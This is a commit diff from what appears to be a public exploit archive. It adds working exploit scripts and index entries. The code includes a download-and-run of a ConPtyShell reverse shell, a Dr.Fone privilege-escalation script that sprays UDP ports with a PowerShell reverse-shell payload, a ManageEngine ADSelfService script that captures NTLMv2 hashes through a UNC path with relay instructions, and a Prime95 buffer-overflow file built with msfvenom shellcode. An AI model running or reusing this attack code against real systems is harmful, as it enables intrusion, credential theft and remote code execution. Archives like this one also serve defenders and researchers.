RADDR = "192.168.14.137"
RPORT = 12345
param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"
client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345))
result = client.call('system_s','powershell',param)
# stty raw -echo; (stty size; cat) | nc -lvnp 1338

27
exploits/windows/local/50913.py Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)
# Date: 4/27/2022
# Exploit Author: Netanel Cohen & Tomer Peled
# Vendor Homepage: https://drfone.wondershare.net/
# Software Link: https://download.wondershare.net/drfone_full4008.exe
# Version: up to 12.0.7
# Tested on: Windows 10
# CVE : 2021-44596
# References: https://github.com/netanelc305/WonderShell
Wondershare LTD Dr. Fone as of 2021-12-06 version is affected by Remote code execution. Due to software design flaws an unauthenticated user can communicate over UDP with the "InstallAssistService.exe" service(the service is running under SYSTEM privileges) and manipulate it to execute malicious executable without any validation from a remote location and gain SYSTEM privileges
#!/usr/bin/python3
# stty raw -echo; (stty size; cat) | nc -lvnp 1337
import socket
payload = """WindowsPowerShell\\v1.0\powershell.exe
-nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.14.129',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Admin
12345"""
byte_message = bytes(payload, "utf-8")
for i in range(1024,65500):
opened_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
opened_socket.sendto(byte_message, ("192.168.14.137", i))
print(f"Trying port {i}",end="\r")

136
exploits/windows/remote/50904.py Executable file
View file

@ -0,0 +1,136 @@
# Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Details: https://docs.unsafe-inline.com/0day/multiple-manageengine-applications-critical-information-disclosure-vulnerability
# Version: ADSelfService Plus Build < 6121
# Tested against: Build 6118
# CVE: CVE-2022-29457
# !/usr/bin/python3
import argparse
import requests
import urllib3
import random
import sys
"""
1-
a)Set up SMB server to capture NTMLv2 hash.
python3 smbserver.py share . -smb2support
b)For relaying to SMB:
python3 ntlmrelayx.py -smb2support -t smb://TARGET
c)For relaying to LDAP:
python3 ntlmrelayx.py -t ldaps://TARGET
2- Fire up the exploit.
You will obtain the NTLMv2 hash of user/computer account that runs the ADSelfService in five minutes.
"""
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def get_args():
parser = argparse.ArgumentParser(
epilog="Example: exploit.py -t https://Target/ -l Listener-IP -a adselfservice -d unsafe.local -u operator1 -p operator1")
parser.add_argument('-d', '--domain', required=True, action='store', help='DNS name of the target domain. ')
parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type adselfservice. If you have credentials of the domain user, type domain')
parser.add_argument('-u', '--user', required=True, action='store')
parser.add_argument('-p', '--password', required=True, action='store')
parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
parser.add_argument('-l', '--listener', required=True, action='store', help='Listener IP to capture NTLMv2 hash')
args = parser.parse_args()
return args
def scheduler(domain, auth, target, listener, user, password):
try:
with requests.Session() as s:
gUrl = target
getCsrf = s.get(url=gUrl, allow_redirects=False, verify=False)
csrf = getCsrf.cookies['_zcsr_tmp']
print("[*] Csrf token: %s" % getCsrf.cookies['_zcsr_tmp'])
if auth.lower() == 'adselfservice':
auth = "ADSelfService Plus Authentication"
data = {
"loginName": user,
"domainName": auth,
"j_username": user,
"j_password": password,
"AUTHRULE_NAME": "ADAuthenticator",
"adscsrf": [csrf, csrf]
}
#Login
url = target + "j_security_check"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)
#Auth Check
url2 = target + "webclient/index.html"
req2 = s.get(url2, headers=headers, allow_redirects=False, verify=False)
if req2.status_code == 200:
print("[+] Authentication is successful.")
elif req2.status_code == 302:
print("[-] Login failed.")
sys.exit(1)
else:
print("[-] Something went wrong")
sys.exit(1)
dn = domain.split(".")
r1 = random.randint(1, 1000)
surl = target + 'ServletAPI/Reports/saveReportScheduler'
data = {
'SCHEDULE_ID':'0',
'ADMIN_STATUS':'3',
'SCHEDULE_NAME': 'enrollment' + str(r1),
'DOMAINS': '["'+ domain +'"]',
'DOMAIN_PROPS': '{"'+ domain +'":{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","DOMAIN_SELECTED_OUS_GROUPS":{"ou":[{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","NAME":"'+ domain +'"}]}}}',
'SELECTED_REPORTS': '104,105',
'SELECTED_REPORT_LIST': '[{"REPORT_CATEGORY_ID":"3","REPORT_LIST":[{"CATEGORY_ID":"3","REPORT_NAME":"adssp.reports.enroll_rep.enroll.heading","IS_EDIT":false,"SCHEDULE_ELEMENTS":[],"REPORT_ID":"104"},{"CATEGORY_ID":"3","REPORT_NAME":"adssp.common.text.non_enrolled_users","IS_EDIT":true,"SCHEDULE_ELEMENTS":[{"DEFAULT_VALUE":false,"size":"1","ELEMENT_VALUE":false,"uiText":"adssp_reports_enroll_rep_non_enroll_show_notified","name":"SHOW_NOTIFIED","id":"SHOW_NOTIFIED","TYPE":"checkbox","class":"grayfont fntFamily fntSize"}],"REPORT_ID":"105"}],"REPORT_CATEGORY_NAME":"adssp.xml.reportscategory.enrollment_reports"}]',
'SCHEDULE_TYPE': 'hourly',
'TIME_OF_DAY': '0',
'MINS_OF_HOUR': '5',
'EMAIL_ID': user +'@'+ domain,
'NOTIFY_ADMIN': 'true',
'NOTIFY_MANAGER': 'false',
'STORAGE_PATH': '\\\\' + listener + '\\share',
'FILE_FORMAT': 'HTML',
'ATTACHMENT_TYPE': 'FILE',
'ADMIN_MAIL_PRIORITY': 'Medium',
'ADMIN_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_sub',
'ADMIN_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_msg_html',
'MANAGER_FILE_FORMAT': 'HTML',
'MANAGER_ATTACHMENT_TYPE': 'FILE',
'MANAGER_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_mgr_sub',
'MANAGER_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_mgr_msg_html',
'adscsrf': csrf
}
sch = s.post(surl, data=data, headers=headers, allow_redirects=False, verify=False)
if 'adssp.reports.schedule_reports.storage_path.unc_storage_path' in sch.text:
print('[-] The target is patched!')
sys.exit(1)
if sch.status_code == 200:
print("[+] The report is scheduled. The NTLMv2 hash will be captured in five minutes!")
else:
print("[-] Something went wrong. Please, try it manually!")
sys.exit(1)
except:
print('[-] Connection error!')
def main():
arg = get_args()
domain = arg.domain
auth = arg.auth
user = arg.user
password = arg.password
target = arg.target
listener = arg.listener
scheduler(domain, auth, target, listener, user, password)
if __name__ == "__main__":
main()

46
exploits/windows/remote/50905.py Executable file
View file

@ -0,0 +1,46 @@
# Exploit Title: Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-04-25
# Vendor Homepage: https://www.mersenne.org/
# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip
# Tested Version: 30.7 build 9
# Vulnerability Type: Buffer Overflow (RCE) Local
# Tested on OS: Windows 7 Professional x86
# Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE
# 1- How to use: open the program go to test-PrimeNet-check the square-Connections
# 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will open
buffer = "A" * 144
jum = "\xd8\x29\xe7\x6e" #push esp # ret | {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll)
nop = "\x90" * 20 #Nob
hot = "C" * 100
#sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payload
payload = b""
payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d"
payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d"
payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6"
payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2"
payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a"
payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff"
payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f"
payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca"
payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d"
payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0"
payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b"
payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50"
payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d"
payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12"
payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d"
payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63"
payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f"
payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa"
payload += b"\xc7\x33\x80\xb2"
evil = buffer + jum + nop + payload
file = open('PExploit.txt','w+')
file.write(evil)
file.close()

40
files_exploits.csv
View file

@ -11481,6 +11481,12 @@ id,file,description,date,author,type,platform,port
50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows, 50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
50885,exploits/windows/local/50885.txt,"PTPublisher v2.3.4 - Unquoted Service Path",1970-01-01,bios,local,windows, 50885,exploits/windows/local/50885.txt,"PTPublisher v2.3.4 - Unquoted Service Path",1970-01-01,bios,local,windows,
50886,exploits/windows/local/50886.txt,"EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path",1970-01-01,bios,local,windows, 50886,exploits/windows/local/50886.txt,"EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path",1970-01-01,bios,local,windows,
50901,exploits/windows/local/50901.txt,"UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path",1970-01-01,"Edgar Carrillo Egea",local,windows,
50902,exploits/windows/local/50902.txt,"TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path",1970-01-01,"Edgar Carrillo Egea",local,windows,
50903,exploits/windows/local/50903.txt,"Wondershare Dr.Fone 11.4.10 - Insecure File Permissions",1970-01-01,AkuCyberSec,local,windows,
50911,exploits/linux/local/50911.py,"ExifTool 12.23 - Arbitrary Code Execution",1970-01-01,UNICORD,local,linux,
50912,exploits/windows/local/50912.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)",1970-01-01,"Netanel Cohen",local,windows,
50913,exploits/windows/local/50913.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)",1970-01-01,"Netanel Cohen",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18674,6 +18680,20 @@ id,file,description,date,author,type,platform,port
50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,remote,hardware, 50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,remote,hardware,
50879,exploits/hardware/remote/50879.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware, 50879,exploits/hardware/remote/50879.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware,
50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",1970-01-01,LiquidWorm,remote,hardware, 50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",1970-01-01,LiquidWorm,remote,hardware,
50905,exploits/windows/remote/50905.py,"Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)",1970-01-01,"Yehia Elghaly",remote,windows,
50892,exploits/multiple/remote/50892.py,"Akka HTTP 10.1.14 - Denial of Service",1970-01-01,cxosmo,remote,multiple,
50894,exploits/hardware/remote/50894.py,"USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor",1970-01-01,LiquidWorm,remote,hardware,
50897,exploits/android/remote/50897.txt,"Bookeen Notea - Directory Traversal",1970-01-01,"Clement MAILLIOUX",remote,android,
50900,exploits/multiple/remote/50900.txt,"SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)",1970-01-01,"West Shepherd",remote,multiple,
50904,exploits/windows/remote/50904.py,"ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure",1970-01-01,"Metin Yunus Kandemir",remote,windows,
50906,exploits/hardware/remote/50906.txt,"DLINK DIR850 - Insecure Access Control",1970-01-01,"Ahmed Alroky",remote,hardware,
50907,exploits/hardware/remote/50907.txt,"DLINK DIR850 - Open Redirect",1970-01-01,"Ahmed Alroky",remote,hardware,
50914,exploits/linux/remote/50914.py,"Apache CouchDB 3.2.1 - Remote Code Execution (RCE)",1970-01-01,"Konstantin Burov",remote,linux,
50916,exploits/hardware/remote/50916.txt,"Tenda HG6 v3.3.0 - Remote Command Injection",1970-01-01,LiquidWorm,remote,hardware,
50917,exploits/multiple/remote/50917.js,"Google Chrome 78.0.3904.70 - Remote Code Execution",1970-01-01,"Forrest Orr",remote,multiple,
50918,exploits/python/remote/50918.txt,"PyScript - Read Remote Python Source Code",1970-01-01,"Momen Eldawakhly",remote,python,
50919,exploits/hardware/remote/50919.txt,"DLINK DAP-1620 A1 v1.01 - Directory Traversal",1970-01-01,"Momen Eldawakhly",remote,hardware,
50930,exploits/hardware/remote/50930.py,"Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Minh Khoa",remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44954,3 +44974,23 @@ id,file,description,date,author,type,platform,port
50884,exploits/php/webapps/50884.txt,"Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Ali J",webapps,php, 50884,exploits/php/webapps/50884.txt,"Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Ali J",webapps,php,
50888,exploits/ruby/webapps/50888.txt,"Gitlab 14.9 - Authentication Bypass",1970-01-01,Greenwolf,webapps,ruby, 50888,exploits/ruby/webapps/50888.txt,"Gitlab 14.9 - Authentication Bypass",1970-01-01,Greenwolf,webapps,ruby,
50889,exploits/ruby/webapps/50889.txt,"GitLab 14.9 - Stored Cross-Site Scripting (XSS)",1970-01-01,Greenwolf,webapps,ruby, 50889,exploits/ruby/webapps/50889.txt,"GitLab 14.9 - Stored Cross-Site Scripting (XSS)",1970-01-01,Greenwolf,webapps,ruby,
50890,exploits/php/webapps/50890.txt,"ImpressCMS v1.4.4 - Unrestricted File Upload",1970-01-01,"Ünsal Furkan Harani",webapps,php,
50891,exploits/php/webapps/50891.txt,"Microfinance Management System 1.0 - 'customer_number' SQLi",1970-01-01,"Eren Gozaydin",webapps,php,
50893,exploits/php/webapps/50893.py,"WebTareas 2.4 - Blind SQLi (Authenticated)",1970-01-01,"Behrad Taher",webapps,php,
50895,exploits/php/webapps/50895.txt,"WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated)",1970-01-01,"Roel van Beurden",webapps,php,
50896,exploits/php/webapps/50896.txt,"Magento eCommerce CE v2.3.5-p2 - Blind SQLi",1970-01-01,"Aydin Naserifard",webapps,php,
50898,exploits/php/webapps/50898.py,"Bitrix24 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,heinjame,webapps,php,
50899,exploits/php/webapps/50899.txt,"CSZ CMS 1.3.0 - 'Multiple' Blind SQLi",1970-01-01,"Dogukan Dincer",webapps,php,
50908,exploits/multiple/webapps/50908.txt,"Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)",1970-01-01,"Tin Pham",webapps,multiple,
50909,exploits/multiple/webapps/50909.txt,"Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)",1970-01-01,"Tin Pham",webapps,multiple,
50910,exploits/php/webapps/50910.txt,"e107 CMS v3.2.1 - Multiple Vulnerabilities",1970-01-01,"Hubert Wojciechowski",webapps,php,
50915,exploits/php/webapps/50915.py,"Anuko Time Tracker - SQLi (Authenticated)",1970-01-01,Altelus,webapps,php,
50931,exploits/hardware/webapps/50931.txt,"TLR-2005KSH - Arbitrary File Upload",1970-01-01,"Ahmed Alroky",webapps,hardware,
50920,exploits/php/webapps/50920.txt,"Explore CMS 1.0 - SQL Injection",1970-01-01,"Sajibe Kanti",webapps,php,
50921,exploits/php/webapps/50921.py,"Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated)",1970-01-01,cheshireca7,webapps,php,
50922,exploits/php/webapps/50922.txt,"PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andrea Intilangelo",webapps,php,
50923,exploits/php/webapps/50923.py,"Beehive Forum - Account Takeover",1970-01-01,"Pablo Santiago",webapps,php,
50924,exploits/php/webapps/50924.py,"MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Altelus,webapps,php,
50925,exploits/php/webapps/50925.html,"WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Abisheik M",webapps,php,
50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",1970-01-01,"Wolfgang Hotwagner",webapps,php,
50928,exploits/php/webapps/50928.txt,"WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)",1970-01-01,"Hassan Khan Yusufzai",webapps,php,

Can't render this file because it is too large.